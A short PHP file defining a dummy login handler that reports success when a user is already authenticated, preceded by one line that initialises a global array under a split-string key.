<?php
$GLOBALS["__65da1b1ec" . "2d6653e8a0a" . "b7848e53621" . "5"] = (@$GLOBALS["__65da1b1" . "ec2d6653e" . "8a0ab7848" . "e536215"] ?: array()) + array();






class LoginHandlerDummy extends LoginHandler
{
    public function TryLogin()
    {
        if (AuthUser::I()->GetId()) {
            $this->last_user_id = AuthUser::I()->GetId();
            return LoginHandler::SUCCESS;
        }
        return LoginHandler::NO_DATA;
    }
}